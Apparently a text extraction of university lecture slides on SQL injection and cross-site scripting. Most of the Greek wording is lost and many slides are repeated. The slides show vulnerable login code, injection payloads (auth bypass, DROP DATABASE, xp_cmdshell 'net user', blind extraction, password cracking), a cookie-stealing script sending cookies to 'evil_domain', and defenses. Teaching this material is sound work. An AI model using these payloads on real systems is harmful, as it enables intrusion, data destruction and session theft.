1
7 2016
7 2016
https://www.icsd.aegean.gr/t.tzouramanis/courses/[email protected]
https://www.icsd.aegean.gr/t.tzouramanis/courses/[email protected]
2
SQL(SQL Injection)
SQL(SQL Injection)
4https://www.linkedin.com/pulse/why-does-sql-injection-still-work-2015-greg-macphersonhttps://www.linkedin.com/pulse/why-does-sql-injection-still-work-2015-greg-macpherson 5https://www.veracode.com/blog/2016/04/why-sql-injection-still-aroundhttps://www.veracode.com/blog/2016/04/why-sql-injection-still-around
6J. Clarke : SQL Injection Attacks and Defense, 2nd Edition, Syngress, 2012J. Clarke : SQL Injection Attacks and Defense, 2nd Edition, Syngress, 2012 7P. Russell: Ethical hacking: Basic Hacking With SQL Injection, WhitePlanet, 2015P. Russell: Ethical hacking: Basic Hacking With SQL Injection, WhitePlanet, 2015
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
2
8
Firewall Firewall Firewall
.
‘ ’ firewalls
firewalls - -
, . server databases.
Firewall
.
‘ ’
firewalls firewalls -
- , . server databases.
9
Firewall( )
Firewall( )
server, ( ,
ports) firewall.firewall
, . :web server 80,e-mail SMTP server 25,SQL server 1433,MySQL server 3306,Oracle Net Listener 1521, .
firewalls software ( .Gauntlet, Firewall-1, Raptor) hardware ( .Cisco Firewall).
server, ( ,
ports) firewall.firewall
, . :web server 80,e-mail SMTP server 25,SQL server 1433,MySQL server 3306,Oracle Net Listener 1521, .
firewalls software ( .Gauntlet, Firewall-1, Raptor) hardware ( .Cisco Firewall).
10
Firewall Firewallhackers ‘
’, .
hackers firewall, .e-mail attachments,
- ‘ ’ ,cookies,
http ( . :
http://mywebsite/myapp.cgi?acctnum=3), .
.
hackers ‘’, .
hackers firewall, .e-mail attachments,
- ‘ ’ ,cookies,
http ( . :
http://mywebsite/myapp.cgi?acctnum=3), .
.11
Firewalls Firewalls
firewall .
( : secureweb ).
web: SQL.
firewall .
( : secureweb ).
web: SQL.
12
SQL SQL: hacker
webSQL .
: Rain Forest Puppy, 1998.
Jeremiah GrossmanRain forest puppy (rfp) is one of the REAL pioneers of the industry whocontributed a ton of cutting-edge research that we still use today. You'llalso notice that he's a very humble guy who prefers to continue givingback rather than taking the credit he deserves. Welcome back rfp.
: hackerweb
SQL .: Rain Forest Puppy, 1998.
Jeremiah GrossmanRain forest puppy (rfp) is one of the REAL pioneers of the industry whocontributed a ton of cutting-edge research that we still use today. You'llalso notice that he's a very humble guy who prefers to continue givingback rather than taking the credit he deserves. Welcome back rfp. 13
SQL( )
SQL( )
ASPlogin web:
<% dim username, password;txt_username = Request.form("text_username");txt_password = Request.form("text_password");var con = Server.CreateObject(ADODB.Connection"); var rso = Server.CreateObject(ADODB.Recordset"); var str_query = "select * from USERS where username = ' " +
txt_username + " ' and password = ' " + txt_password + " ';";rso.open(str_query, con);if (rso.eof) then
response.write "Invalid login."else
response.write "Welcome to the database!"; %>
ASPlogin web:
<% dim username, password;txt_username = Request.form("text_username");txt_password = Request.form("text_password");var con = Server.CreateObject(ADODB.Connection"); var rso = Server.CreateObject(ADODB.Recordset"); var str_query = "select * from USERS where username = ' " +
txt_username + " ' and password = ' " + txt_password + " ';";rso.open(str_query, con);if (rso.eof) then
response.write "Invalid login."else
response.write "Welcome to the database!"; %>
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
3
14
String sLogin = getParameter("Login");String sPassword = getParameter("Password");String query = "SELECT member_id, member_level FROM membersWHERE member_login=' "+ sLogin + " ' AND member_password=' " + sPassword + " ' ";Statement stat = connection.createStatement();ResultSet rs = stat.executeQuery(query);
15
SQL( )
SQL( )
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
:username: ttzourampassword: 45dc&vg3
string sql :select * from users where username = 'ttzouram' and password = '45dc&vg3';
:Welcome to the database!
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
:username: ttzourampassword: 45dc&vg3
string sql :select * from users where username = 'ttzouram' and password = '45dc&vg3';
:Welcome to the database!
16
SQL( - )
SQL( - )
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
:username: ttzou'rampassword: 45dc&vg3
string sql :select * from users where username = 'ttzou'ram' and password = '45dc&vg3';
:Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’[Microsoft][ODBC SQL Server Driver][SQL Server][Line 1: Incorrect syntax near ‘ram‘/process_login.asp, line 14
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
:username: ttzou'rampassword: 45dc&vg3
string sql :select * from users where username = 'ttzou'ram' and password = '45dc&vg3';
:Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’[Microsoft][ODBC SQL Server Driver][SQL Server][Line 1: Incorrect syntax near ‘ram‘/process_login.asp, line 14
17
SQL( - )
SQL( - )
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
hacker :username: ' or 1=1--password: anything
string sql :select * from users where username = '' or 1=1--' and password = 'anything';
: users.
hacker,
admin.
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
hacker :username: ' or 1=1--password: anything
string sql :select * from users where username = '' or 1=1--' and password = 'anything';
: users.
hacker,
admin.
18
SQL( - )
SQL( - )
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
hacker username:username: ' or username='ttzouram'--password: anything
string sql :select * from users where username = '' or username='ttzouram'--' and
password = 'anything';hacker
ttzouram,password .
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
hacker username:username: ' or username='ttzouram'--password: anything
string sql :select * from users where username = '' or username='ttzouram'--' and
password = 'anything';hacker
ttzouram,password .
19
SQL
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
4
20
SQL( - )
SQL( - )
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
hacker :username: ' and 1 in (select @@version)--password: anything
error:Microsoft OLE DB Provider for ODBC Drivers error ' 80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server][Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright © 1998-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 3) ' to a column of data type int./process_login.asp, line 14
SQL ServerWindows! hacker googlesearch server.
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
hacker :username: ' and 1 in (select @@version)--password: anything
error:Microsoft OLE DB Provider for ODBC Drivers error ' 80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server][Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright © 1998-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 3) ' to a column of data type int./process_login.asp, line 14
SQL ServerWindows! hacker googlesearch server. 21
SQL( - )
SQL( - )
22
username: ' UNION SELECT @@version, NULL --password: anything
:Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data typeint
23
SQL( - )
SQL( - )
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
hacker :username: ' ;SHUTDOWN--password:
SQL Server.
' ;DROP Database < >--, ' ;DROP Table < >--, ' ;DELETE FROM < >--, .
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
hacker :username: ' ;SHUTDOWN--password:
SQL Server.
' ;DROP Database < >--, ' ;DROP Table < >--, ' ;DELETE FROM < >--, .
SQL Server
24
SQL( - )
SQL( - )
ZU 0666', 0, 0); DROP DATABASE TABLICE;--
;
ZU 0666', 0, 0); DROP DATABASE TABLICE;--
;
25
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
5
26
username: ' AND ascii(lower(substring( (SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108) --
ASCII
108
ASCII
108
;
27
username: ' AND ascii(lower(substring( (SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108 WAITFOR DELAY '0:0:5') --
ASCII
108
ASCII
108
;
28
SQL( )
SQL( )
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
1.hacker :username: '; create table foo(a int identity(1,1), b varchar(4000));insert into foo exec master..xp_cmdshell 'dir'--password:
2.1, hacker :
username: ' or 1 in (select b from foo where a=1)--password:
: a = 1 a = 2, a= 3, .
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
1.hacker :username: '; create table foo(a int identity(1,1), b varchar(4000));insert into foo exec master..xp_cmdshell 'dir'--password:
2.1, hacker :
username: ' or 1 in (select b from foo where a=1)--password:
: a = 1 a = 2, a= 3, .
31
SQL( – )
SQL( – )
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
3.hacker :
username: '; create table foo2(a int identity(1,1), b varchar(4000)); insertinto foo2 exec master..xp_cmdshell 'cmd /c net user'--password:
4.5, hacker :
username: ' or 1 in (select b from foo2 where a=1)--password:
: a = 1 a = 2, a = 3, .
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
3.hacker :
username: '; create table foo2(a int identity(1,1), b varchar(4000)); insertinto foo2 exec master..xp_cmdshell 'cmd /c net user'--password:
4.5, hacker :
username: ' or 1 in (select b from foo2 where a=1)--password:
: a = 1 a = 2, a = 3, .
32
SQL( – )
SQL( – )
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
5. hacker:
username: ttz'; exec master..xp_cmdshell 'nslookup dblab1.samos.aegean.gr >c:\fooo.txt'--password:
:foo.
6. hacker:
username: ttzourampassword: 12345' or 1=1 or '' = '
: Oracle.
var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";
5. hacker:
username: ttz'; exec master..xp_cmdshell 'nslookup dblab1.samos.aegean.gr >c:\fooo.txt'--password:
:foo.
6. hacker:
username: ttzourampassword: 12345' or 1=1 or '' = '
: Oracle.
33
SQL Windows Server SQL Windows Server
M SQLsp_OACreate,
sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProper-ty, sp_OAMethod hacker
Active Directory IISWindows Server!
M SQLxp_instance_regadd-
multistring, xp_instance_regwrite, xp_instance_reg-read, xp_regdeletekey, xp_regdeletevalue,xp_regremove, hacker
registry Windows Server!
M SQLsp_OACreate,
sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProper-ty, sp_OAMethod hacker
Active Directory IISWindows Server!
M SQLxp_instance_regadd-
multistring, xp_instance_regwrite, xp_instance_reg-read, xp_regdeletekey, xp_regdeletevalue,xp_regremove, hacker
registry Windows Server!
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
6
34
SQL Server SQL
SQL Server SQL
--.
SQL
; .error outputs
SQL Server .
--.
SQL
; .error outputs
SQL Server .
35
SQL SQL
:
:1.
web .2.
(log file).
:
:1.
web .2.
(log file).
36
SQL( )
SQL( )
:1.
:a.
(- ;),
:1.
:a.
(- ;),
function validate_string( input )
known_bad = array( "select", "insert", "update", "delete", "drop", “shutdown", "--", "'" );
validate_string = true;for i = lbound( known_bad ) to ubound( known_bad )if ( InStr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then
validate_string = false; exit function;end if;
next;end function 37
SQL( )
SQL( )
:1.
:b.
(- ;),
:1.
:b.
(- ;),
function validate_password( input )
good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~@#$%^*(){}[]<>,.?"
validate_password = true;for i = 1 to len( input )
c = mid( input, i, 1 )if ( InStr( good_password_chars, c ) = 0 ) then
validate_password = false; exit function;end if;
next;end function
38
SQL( )
SQL( )
:1.
:c.
,‘
‘:
:1.
:c.
,‘
‘:
function escape( input )input = replace(input, " ' ", " ' ' ");escape = input;
end function
39
SQL( )
SQL( )
:1.
:d. , .
username varchar(12)varchar(256),
string, .
'; SHUTDOWN;--varchar(<14)
:1.
:d. , .
username varchar(12)varchar(256),
string, .
'; SHUTDOWN;--varchar(<14)
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
7
40
SQL( )
SQL( )
( ):2.
xp_cmdshell, xp_regread, xp_resultset,( Oracle: utl_file, dbms_lob, dbms_pipe,dbms_output, utl_http,utl_smtp).
( ):2.
xp_cmdshell, xp_regread, xp_resultset,( Oracle: utl_file, dbms_lob, dbms_pipe,dbms_output, utl_http,utl_smtp).
41
SQL( )
SQL( )
( ):3.
.
( )( ) .
( ):3.
.
( )( ) .
42
SQL( )
SQL( )
( ):4.
,(
server).
.
( ):4.
,(
server).
.
HashUsername = md5(username);HashPassword = md5(password);connect('testserver.com','root','')select_db('testdb'); sql_query = "SELECT username FROM users WHERE username = HashUsername and password = HashPassword";//execute the query$result = query($sql_query) 43
SQL( )
SQL( )
44
SQL( )
SQL( )
( ):5.
(, .
http://goo.gl/JPtms),bug
.
( ):5.
(, .
http://goo.gl/JPtms),bug
.
45
SQL
SQL
web
password .
, hacker :username: admin'--password: anything
SQL insert :
insert into users values( 123, 'admin''--', 'anything' )
web
password .
, hacker :username: admin'--password: anything
SQL insert :
insert into users values( 123, 'admin''--', 'anything' )
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
8
46
SQL ( )
SQL ( )
password .:
username = escape( Request.form("username") );oldpassword = escape( Request.form("oldpassword") );newpassword = escape( Request.form("newpassword") );var rso = Server.CreateObject("ADODB.Recordset");var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";rso.open( sql, cn );if (rso.EOF){…
password .:
username = escape( Request.form("username") );oldpassword = escape( Request.form("oldpassword") );newpassword = escape( Request.form("newpassword") );var rso = Server.CreateObject("ADODB.Recordset");var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";rso.open( sql, cn );if (rso.EOF){…
47
SQL ( )
SQL ( )
SQL password:
sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'"
rso("username") usernamelogin.
hacker admin'--,SQL :
update users set password = 'password' where username = 'admin'--'
hacker password admin!
. ’ O’Hara -
username .
SQL password:
sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'"
rso("username") usernamelogin.
hacker admin'--,SQL :
update users set password = 'password' where username = 'admin'--'
hacker password admin!
. ’ O’Hara -
username .
48
SQL (log file)
SQL (log file)
hackersp_password ( , username: 'admin'--
sp_password) log file:
-- 'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.
hackersp_password ( , username: 'admin'--
sp_password) log file:
-- 'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.
49
Script Passwords Passwords Username
Script Passwords Passwords Username
script .
SQL server.script
dict(word varchar(256)) master. passwords
.
script .
SQL server.script
dict(word varchar(256)) master. passwords
.select name, word as password from dict inner join sysxloginson (pwdcompare( word, sysxlogins.password, 0 ) = 1)union select name, password from sysxlogins where(pwdcompare( name, password, 0 ) = 1)union select name, null from sysxloginswhere password is null;
50
... ...
web portal ?
SQL injection examination
server
original database
server
51
...( )
Prepared statements
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
9
52
*
SQL
SQL
.
* K. Kemalis and T. Tzouramanis: “SQL-IDS: A Specification-based Approach for SQL-Injection Detection”,In Proceedings of the 23rd ACM Symposium on Applied Computing (ACM SAC 2008) - ComputerSecurity Track, Fortaleza, Ceara, Brazil, March 2008.
* K. Kemalis and T. Tzouramanis: “SQL-IDS: A Specification-based Approach for SQL-Injection Detection”,In Proceedings of the 23rd ACM Symposium on Applied Computing (ACM SAC 2008) - ComputerSecurity Track, Fortaleza, Ceara, Brazil, March 2008. 53
54
SQL-IDS(SQL-Injection Detection System -
SQL )
Java.
55
SQL-IDS
56
57
SQL .
EBNF (Extended Backus–Naur Form).
.: http://savage.net.au/SQL/sql-2003-2.bnf.html
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
10
58
…
SQL :
SELECT member_idFROM membersWHERE (member_login = 'guest' OR member_email =
'[email protected]') AND member_password = 'guest‘;
59
…
<Query specification> :=SELECT <SELECT List> <FROM Clause> <WHERE Clause>
<SELECT List> := <Table Column> (<COMMA> <Table Column> )
<Table Column> := <IDENTIFIER>
<FROM Clause> := FROM <Table reference>
<Table reference> := <IDENTIFIER>
<WHERE Clause> :=WHERE <search condition> AND <search condition>
<search condition> := <Table Column> "=" <STRING_LITERAL>
60
• :0 - 20 milliseconds
• :0,5 milliseconds
61
62 63
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
11
66
: Security AppScan Source Edition
Fortify Source Code AnalyzerCodeSecureKlocwork Solo
.
:GrauditYet Another Source Code Analyzer (YASCA)PixyAppCodeScanOWASP LAPSE+ ProjectMicrosoft Source Code Analyzer for SQL InjectionMicrosoft Code Analysis Tool .NET (CAT.NET)RIPS—A Static Source Code Analyzer for Vulnerabilities in PHPScriptsCodePro AnalytiXTeachable Static Analysis Workbench
67
SQL
BSQL ( ):
68
(Cross Site Scripting Attacks)
(Cross Site Scripting Attacks)
69
XSS
• :
• :
.• : ,
.• : , ,
.• : ,
.
70
Owasp (Open Web Application Security Project) (2007)
71
XSS
3 :
• (Dom Based):Document Object Model
.
• ( ):
server.
• ( ):( . . )
.
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
12
72
• : javascript,
, .server.
• :
.server
.
• : forum.
. server
.. 73
74
( )
• 1: ,
:
75
• 2: server
( )
# server
76
( )
3:,
.
77
2. URL
6.
5. server, o URL
-
, .
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
13
78
79
( )
• 1:
. .link e-mail.
:
$_GET $_REQUEST
80
( )
• 2: O server .
81
• 3.server
server,
.
( )
82
2. URL
6.
5.
security context .
83
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
14
84
( )
• 1:
.
<
85
• 2: :
( )
86
• 3: O server,
.
( )
87
6.
5.
.
88
XSS ;
89
XSS *
* : " ", , , . , 2008.
* : " ", , , . , 2008.
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
15
90
forum. :
, (posts),
, ,
.
91
Apache Web Servermysql-essentialphpphpMyAdminJavascript
92
93
94
95
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
16
96
97
98
pop up
99
<script>document.location ='http://evil_domain/steal.php?cookies=' + document.cookie</script>
GET
100
101
site
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
17
102
103
104
<script>document.location='http://evil_domain/steal.php?cookies=' + document.cookie</script>
105
Click!
106
Script inside steal.php:
107
”refresh”
!
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017
18
108
<script>document.location='http://evil_domain/steal.php?cookies=' + document.cookie</script>
109
[1]
•
: DOM,
javascript, ,
, .
Noxies [2]
•
HTTP.
•
.• HTTP Referrer
.
110
* .
HTTP Referrer , .
:[1] Vogt P., Nentwich F., Jovanovic N., Kirda E., Kruegel C., Vigna G. :Cross-Site Scripting Prevention with Dynamic Data Tainting and StaticAnalysis, Proc Network and Distributed System Security Symposium,San Diego, 2007
[2] Kirda E., Kruegel C., Vigna G., Jovanovic N.: Noxes: A Client-SideSolution for Mitigating Cross-Site Scripting Attacks, Proc. 21st AnnualACM Symposium on Applied Computing, France, 2006
111
112
XSS
• : server,
(security patches),.
• :
,
.• :
.• : javascript ,
, cookies ,«
».
SQL XSS- -
SQL XSS- -
Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017